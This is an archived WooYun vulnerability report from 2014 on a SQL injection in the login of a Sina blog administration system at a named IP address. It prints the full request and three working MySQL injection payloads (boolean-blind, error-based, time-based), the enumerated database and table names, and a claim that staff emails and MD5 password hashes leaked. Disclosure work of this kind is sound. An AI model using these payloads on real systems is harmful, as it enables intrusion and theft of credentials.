乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-04-17: 细节已通知厂商并且等待厂商处理中 2014-04-17: 厂商已经确认,细节仅向厂商公开 2014-04-27: 细节向核心白帽子及相关领域专家公开 2014-05-07: 细节向普通白帽子公开 2014-05-17: 细节向实习白帽子公开 2014-06-01: 细节向公众公开
新浪某重要系统注入漏洞,内部信息泄露
https://219.142.118.208/,新浪后台博客管理系统存在注入。
登陆请求为:
https://219.142.118.208//ac=validate?checkwd=1&password=1397711970&password1=g00dPa$$w0rD&pwd_easy=0×tamp=1397711970&username=admin
其中username参数存在注入databases:
Place: POSTParameter: username Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: checkwd=1&password=1397711970&password1=g00dPa$$w0rD&pwd_easy=0×tamp=1397711970&username=admin' RLIKE IF(2027=2027,0x61646d696e,0x28) AND 'ddFw'='ddFw Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: checkwd=1&password=1397711970&password1=g00dPa$$w0rD&pwd_easy=0×tamp=1397711970&username=admin' AND (SELECT 4711 FROM(SELECT COUNT(*),CONCAT(0x3a786f713a,(SELECT (CASE WHEN (4711=4711) THEN 1 ELSE 0 END)),0x3a696d6b3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'rsOz'='rsOz Type: AND/OR time-based blind Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: checkwd=1&password=1397711970&password1=g00dPa$$w0rD&pwd_easy=0×tamp=1397711970&username=admin' AND 2112=BENCHMARK(5000000,MD5(0x676d7745)) AND 'FBvx'='FBvx---web application technology: Apache 2.2.11, PHP 5.2.9back-end DBMS: MySQL 5.0available databases [3]:[*] elink[*] information_schema[*] test
elink中的表:
Database: elink[111 tables]+--------------------------------+| apilog || bak_201105 || bak_201106 || bak_201107 || edm_result || edm_task || mdb_redis || upgrade || xad_du || xadmin_ad_manage || xadmin_admin || xadmin_admin_log_201105 || xadmin_admin_log_201106 || xadmin_admin_log_201107 || xadmin_admin_log_201108 || xadmin_admin_log_201109 || xadmin_admin_log_201110 || xadmin_admin_log_201111 || xadmin_admin_log_201112 || xadmin_admin_log_201201 || xadmin_admin_log_201202 || xadmin_admin_log_201203 || xadmin_admin_log_201204 || xadmin_admin_log_201205 || xadmin_admin_log_201206 || xadmin_admin_log_201207 || xadmin_admin_log_201208 || xadmin_admin_log_201209 || xadmin_admin_log_201210 || xadmin_admin_log_201211 || xadmin_admin_log_201212 || xadmin_admin_log_201301 || xadmin_admin_log_201302 || xadmin_admin_log_201303 || xadmin_admin_log_201304 || xadmin_admin_log_201305 || xadmin_admin_log_201306 || xadmin_admin_log_201307 || xadmin_admin_log_201308 || xadmin_admin_log_201309 || xadmin_admin_log_201310 || xadmin_admin_log_201311 || xadmin_admin_log_201312 || xadmin_admin_log_201401 || xadmin_admin_log_201402 || xadmin_admin_log_201403 || xadmin_admin_log_201404 || xadmin_admin_log_201405 || xadmin_admin_log_201406 || xadmin_blog_like_count || xadmin_contribute_201111 || xadmin_contribute_201112 || xadmin_contribute_201201 || xadmin_contribute_201202 || xadmin_contribute_201203 || xadmin_contribute_201204 || xadmin_contribute_201205 || xadmin_contribute_201206 || xadmin_contribute_201207 || xadmin_contribute_201208 || xadmin_contribute_201209 || xadmin_contribute_201210 || xadmin_contribute_201211 || xadmin_contribute_201212 || xadmin_contribute_201301 || xadmin_contribute_201302 || xadmin_contribute_201303 || xadmin_contribute_201304 || xadmin_contribute_201305 || xadmin_contribute_201306 || xadmin_contribute_201307 || xadmin_contribute_201308 || xadmin_contribute_201309 || xadmin_contribute_201310 || xadmin_contribute_201311 || xadmin_contribute_201312 || xadmin_contribute_201401 || xadmin_contribute_201402 || xadmin_contribute_201403 || xadmin_contribute_201404 || xadmin_discover_bank || xadmin_discover_manage || xadmin_discover_percentage || xadmin_editor_apply || xadmin_editor_assess || xadmin_editor_formerly_data || xadmin_editor_integral_2012 || xadmin_editor_integral_2013 || xadmin_editor_integral_2014 || xadmin_editor_integral_2015 || xadmin_editor_integral_2016 || xadmin_edm_distribution || xadmin_edm_log || xadmin_edm_process || xadmin_guide_recommend || xadmin_handpick || xadmin_handpick_front || xadmin_hot_tag || xadmin_login_recommend || xadmin_radar_data_tal_20110608 || xadmin_radar_data_tal_20110609 || xadmin_tag_custom || xadmin_tag_editor || xadmin_tag_like_count || xadmin_tag_subscibe || xadmin_tag_writer || xadmin_tj_user_manage || xadmin_writer_blacklist || xadmin_zhi_jp || xadminhis_201105 || xstat_del
内部敏感信息泄露:
包括内部邮箱,账号,职位,MD5密码值,还有很多,只截图了一点点
。
危害等级:高
漏洞Rank:10
确认时间:2014-04-17 17:34
感谢关注新浪安全,已处理
暂无